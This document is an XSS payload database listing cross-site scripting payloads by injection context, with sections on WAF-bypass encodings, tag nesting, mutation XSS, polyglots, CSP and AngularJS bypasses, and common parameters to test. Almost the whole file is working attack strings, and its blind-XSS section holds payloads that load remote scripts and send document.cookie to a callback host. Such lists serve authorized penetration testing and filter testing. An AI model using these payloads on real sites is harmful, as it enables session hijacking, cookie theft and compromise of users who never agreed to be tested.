# XSS Hunter Pro - Advanced Payloads Database
# ============================================
# Categorized XSS payloads for different contexts and WAF bypasses
# Use responsibly and only on authorized targets!

# ============================================
# BASIC REFLECTION DETECTION
# ============================================
XSSHUNTERPROTEST
xsstest12345
"><xsstest12345
'><xsstest12345

# ============================================
# HTML CONTEXT - BASIC
# ============================================
<script>alert(1)</script>
<script>alert(document.domain)</script>
<script>alert(document.cookie)</script>
<script>confirm(1)</script>
<script>prompt(1)</script>
<script>eval(atob('YWxlcnQoMSk='))</script>

# ============================================
# HTML CONTEXT - EVENT HANDLERS
# ============================================
<img src=x onerror=alert(1)>
<img src=x onerror=alert(document.domain)>
<img src=1 onerror=alert(1)>
<img src/="" onerror=alert(1)>
<img src="x" onerror="alert(1)">
<img src=x onerror="javascript:alert(1)">
<img """><script>alert(1)</script>">
<img src=`x`onerror=alert(1)>
<img src=x:alert(1) onerror=eval(src)>
<img src="x:kcf" onerror="alert(1)">
<img src="javascrip&#116;&#58;alert(1)">
<svg onload=alert(1)>
<svg/onload=alert(1)>
<svg onload=alert(document.domain)>
<svg/onload=alert`1`>
<svg><script>alert(1)</script>
<svg><animate onbegin=alert(1)>
<svg><set onbegin=alert(1)>
<body onload=alert(1)>
<body onpageshow=alert(1)>
<body onfocus=alert(1)>
<body onhashchange=alert(1)>
<body onscroll=alert(1)>
<iframe onload=alert(1)>
<iframe src="javascript:alert(1)">
<iframe srcdoc="<script>alert(1)</script>">
<input onfocus=alert(1) autofocus>
<input onblur=alert(1) autofocus><input autofocus>
<input type="image" src=x onerror=alert(1)>
<details open ontoggle=alert(1)>
<details/open/ontoggle=alert(1)>
<audio src=x onerror=alert(1)>
<video src=x onerror=alert(1)>
<video><source onerror="alert(1)">
<marquee onstart=alert(1)>
<marquee loop=1 width=0 onfinish=alert(1)>
<isindex type=image src=1 onerror=alert(1)>
<keygen onfocus=alert(1) autofocus>
<embed src="javascript:alert(1)">
<object data="javascript:alert(1)">
<form><button formaction="javascript:alert(1)">Click
<form><input type=submit formaction="javascript:alert(1)" value=Click>
<select onfocus=alert(1) autofocus>
<textarea onfocus=alert(1) autofocus>
<math><maction actiontype="statusline#http://google.com" xlink:href="javascript:alert(1)">click</maction></math>

# ============================================
# ATTRIBUTE CONTEXT
# ============================================
" onmouseover="alert(1)
' onmouseover='alert(1)
" onfocus="alert(1)" autofocus="
' onfocus='alert(1)' autofocus='
" onclick="alert(1)
' onclick='alert(1)
" onerror="alert(1)
' onerror='alert(1)
" onload="alert(1)
' onload='alert(1)
" oninput="alert(1)
' oninput='alert(1)
" onchange="alert(1)
' onchange='alert(1)
" onblur="alert(1)
' onblur='alert(1)
" ontoggle="alert(1)
' ontoggle='alert(1)
`` onmouseover=alert(1) //
"><script>alert(1)</script>
'><script>alert(1)</script>

# ============================================
# SCRIPT CONTEXT
# ============================================
'-alert(1)-'
"-alert(1)-"
\'-alert(1)//
\"-alert(1)//
';alert(1)//
";alert(1)//
</script><script>alert(1)</script>
</script><img src=x onerror=alert(1)>
</script><svg onload=alert(1)>
'-alert(1)-'
{{constructor.constructor('alert(1)')()}}
{{_htmlInjection}}
${alert(1)}

# ============================================
# URL CONTEXT
# ============================================
javascript:alert(1)
javascript:alert(document.domain)
javascript:alert(document.cookie)
javascript:eval(atob('YWxlcnQoMSk='))
data:text/html,<script>alert(1)</script>
data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
data:text/html,<img src=x onerror=alert(1)>
data:text/html,<svg onload=alert(1)>

# ============================================
# WAF BYPASS - CASE MANIPULATION
# ============================================
<ScRiPt>alert(1)</ScRiPt>
<iMg SrC=x OnErRoR=alert(1)>
<SvG OnLoAd=alert(1)>
<BODY ONLOAD=alert(1)>
<script>alert(1)</script>
<SCRIPT>alert(1)</SCRIPT>
<script>ALERT(1)</script>

# ============================================
# WAF BYPASS - ENCODING
# ============================================
# HTML Entities
<img src=x onerror=&#97;&#108;&#101;&#114;&#116;(1)>
<img src=x onerror=&#x61;&#x6c;&#x65;&#x72;&#x74;(1)>
<img src=x onerror=&#0000097&#0000108&#0000101&#0000114&#0000116(1)>
<script>&#97;&#108;&#101;&#114;&#116;(1)</script>

# Unicode
<img src=x onerror=\u0061lert(1)>
<img src=x onerror=\u0061\u006c\u0065\u0072\u0074(1)>
<script>\u0061\u006c\u0065\u0072\u0074(1)</script>

# URL Encoding
%3Cscript%3Ealert(1)%3C/script%3E
%3Cimg%20src=x%20onerror=alert(1)%3E
%3Csvg%20onload=alert(1)%3E

# Double URL Encoding
%253Cscript%253Ealert(1)%253C/script%253E

# Base64
<img src=x onerror=eval(atob('YWxlcnQoMSk='))>

# Hex
<img src=x onerror=\x61lert(1)>

# ============================================
# WAF BYPASS - WHITESPACE & STRUCTURE
# ============================================
<script/src=data:,alert(1)>
<script     src=data:,alert(1)>
<script		src=data:,alert(1)>
<script
src=data:,alert(1)>
<img/src=x/onerror=alert(1)>
<img    src=x    onerror=alert(1)>
<img		src=x		onerror=alert(1)>
<svg/onload=alert(1)>
<svg    onload=alert(1)>
<svg		onload=alert(1)>
<body/onload=alert(1)>
<body     onload=alert(1)>

# ============================================
# WAF BYPASS - TAG NESTING
# ============================================
<scr<script>ipt>alert(1)</scr</script>ipt>
<scr%00ipt>alert(1)</scr%00ipt>
<<script>alert(1)//<<script>
<<script>alert(1)//</script>
<scri<script>pt>alert(1)</scri</script>pt>
<s<script>cript>alert(1)</s</script>cript>
<script<script>>alert(1)</script</script>>

# ============================================
# WAF BYPASS - NULL BYTES
# ============================================
<scr\x00ipt>alert(1)</script>
<img src=x\x00onerror=alert(1)>
<svg\x00onload=alert(1)>

# ============================================
# WAF BYPASS - COMMENTS
# ============================================
<script>alert(1)<!--</script>
<script>/**/alert(1)/**/</script>
<img src=x onerror=alert(1)//
<img src=x onerror="alert(1)"//

# ============================================
# WAF BYPASS - SPECIAL CHARACTERS
# ============================================
<script>x='';alert(1)//';</script>
<script>x="";alert(1)//";</script>
<img src=x onerror=alert`1`>
<svg onload=alert`1`>
<script>alert`1`</script>
<img src=x onerror=alert&lpar;1&rpar;>
<img src=x onerror="&#40;alert&#40;1&#41;&#41;">

# ============================================
# MUTATION XSS
# ============================================
<math><mtext><table><mglyph><style><img src=x onerror=alert(1)>
<math><mtext><table><mglyph><style><!--</style><img src=x onerror=alert(1)>-->
<math><mtext></mtext><mrow><mtext><table><mglyph><style><!--</style><img src=x onerror=alert(1)>--></style></mglyph></table></mtext></mrow></math>
<form><math><mtext></form><form><mglyph><style><img src=x onerror=alert(1)>
<noscript><img src=x onerror=alert(1)></noscript>
<noscript><p title="</noscript><img src=x onerror=alert(1)>">
<noembed><img src=x onerror=alert(1)></noembed>

# ============================================
# DOM XSS - LOCATION SOURCES
# ============================================
# Location hash
#<script>alert(1)</script>
#"><script>alert(1)</script>
#'><script>alert(1)</script>
#<img src=x onerror=alert(1)>

# Location search
?search=<script>alert(1)</script>
?q=<script>alert(1)</script>
?query=<img src=x onerror=alert(1)>

# Location pathname
/<script>alert(1)</script>
/<img src=x onerror=alert(1)>

# ============================================
# DOM XSS - TEMPLATE LITERALS
# ============================================
${alert(1)}
{{alert(1)}}
{{constructor.constructor('alert(1)')()}}
{{toString.constructor.prototype.valueOf=alert(1)}}
<% alert(1) %>
${`${alert(1)}`}
{${alert(1)}}

# ============================================
# BLIND XSS
# ============================================
<script src=https://xss.ht/YOUR_ID></script>
<script src=https://your-callback.com/xss.js></script>
<img src=x onerror="fetch('https://your-callback.com/?c='+document.cookie)">
<img src=x onerror="new Image().src='https://your-callback.com/?c='+document.cookie">
<script>new Image().src='https://your-callback.com/?c='+document.cookie;</script>
<script>fetch('https://your-callback.com/',{method:'POST',body:document.cookie});</script>
<svg onload="fetch('https://your-callback.com/?c='+document.cookie)">
<input onfocus=fetch('https://your-callback.com/?c='+document.cookie) autofocus>

# ============================================
# POLYGLOT PAYLOADS
# ============================================
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcLiCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
'">><svg/onload=alert(1)><svg/onload=alert(1)>
'">><script>alert(1)</script>"><img src=x onerror=alert(1)>
'"></script><script>alert(1)</script>"><img src=x onerror=alert(1)>
javascript:alert(1)//';alert(1)//";alert(1)//";alert(1)//`--></title></textarea></style></script><svg/onload=alert(1)>//
-->'"/><script>alert(1)</script>"><img src=x onerror=alert(1)>
-->'--"></script><script>alert(1)</script>"><img src=x onerror=alert(1)>

# ============================================
# CSP BYPASS (when possible)
# ============================================
<script src="data:,alert(1)">
<link rel="import" href="data:text/html,<script>alert(1)</script>">
<object data="data:text/html,<script>alert(1)</script>">
<embed src="data:text/html,<script>alert(1)</script>">
<script src="https://jsonurl.appspot.com/"></script>
<script src="https://www.google.com/complete/search?client=chrome&q=alert(1)&callback=alert"></script>

# ============================================
# ANGULARJS XSS
# ============================================
{{constructor.constructor('alert(1)')()}}
{{_htmlInjection}}
{{toString.constructor.prototype.valueOf=alert(1)}}
{{a=toString().constructor.prototype;a.charAt=a.trim;$eval('a,alert(1),a')}}
{{$on.constructor('alert(1)')()}}
{{[].__proto__.constructor('alert(1)')()}}

# ============================================
# REACT XSS (dangerouslySetInnerHTML)
# ============================================
<div dangerouslySetInnerHTML={{__html: '<img src=x onerror=alert(1)>'}} />
"data:text/html,<img src=x onerror=alert(1)>"

# ============================================
# VUE.JS XSS
# ============================================
<div v-html="userInput"></div>
{{constructor.constructor('alert(1)')()}}

# ============================================
# FLASH XSS
# ============================================
flash.swf?xss=javascript:alert(1)
flash.swf?onload=javascript:alert(1)
flash.swf?flashvars=<script>alert(1)</script>

# ============================================
# PDF XSS
# ============================================
# Create PDF with embedded JavaScript
app.alert(1);
app.launchURL("javascript:alert(1)");

# ============================================
# SVG FILE XSS
# ============================================
<?xml version="1.0" encoding="UTF-8"?>
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)">
<script>alert(1)</script>
</svg>

# ============================================
# HTML FILE XSS
# ============================================
<!DOCTYPE html>
<html>
<head><title>XSS</title></head>
<body>
<script>alert(1)</script>
</body>
</html>

# ============================================
# XML FILE XSS
# ============================================
<?xml version="1.0" encoding="UTF-8"?>
<html xmlns="http://www.w3.org/1999/xhtml">
<script>alert(1)</script>
</html>

# ============================================
# EMAIL HEADER XSS
# ============================================
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8

<script>alert(1)</script>

# ============================================
# SPECIAL CONTEXTS
# ============================================

# In JSON
{"key":"<script>alert(1)</script>"}
{"key":"</script><script>alert(1)</script>"}

# In JSONP
callback(<script>alert(1)</script>)
callback({"key":"</script><script>alert(1)</script>"})

# In XML
<key><script>alert(1)</script></key>
<key><![CDATA[<script>alert(1)</script>]]></key>

# In CSS
<style>@import 'javascript:alert(1)';</style>
<style>body{background:url('javascript:alert(1)')}</style>

# ============================================
# FILTER BYPASS TECHNIQUES
# ============================================

# Using different protocols
<a href="data:text/html,<script>alert(1)</script>">click</a>
<a href="vbscript:msgbox(1)">click</a> (IE only)
<a href="file:///etc/passwd">click</a>

# Using different encodings in the same payload
<img src=x onerror="&#97;lert(1)">
<img src=x onerror="al&#101;rt(1)">

# Using HTML5 features
<video poster="javascript:alert(1)">
<input type="hidden" accesskey="X" onclick="alert(1)">
<menu id="x" type="context" onshow="alert(1)">

# Using browser quirks
<img src="x` `<script>alert(1)</script>` `">
<img src=`x`onerror=alert(1)>

# ============================================
# COMMON PARAMETERS TO TEST
# ============================================
# URL parameters that often have XSS:
# ?q= ?query= ?search= ?keyword= ?keywords= ?term= ?text=
# ?id= ?page= ?url= ?redirect= ?next= ?return= ?returnUrl=
# ?callback= ?jsonp= ?cb= ?api= ?data= ?json= ?xml=
# ?file= ?path= ?folder= ?include= ?require= ?template=
# ?name= ?title= ?desc= ?description= ?content= ?message=
# ?input= ?value= ?val= ?param= ?arg= ?argument= ?var=
# ?p= ?s= ?r= ?l= ?link= ?src= ?source= ?target= ?dest=

# ============================================
# END OF PAYLOADS DATABASE
# ============================================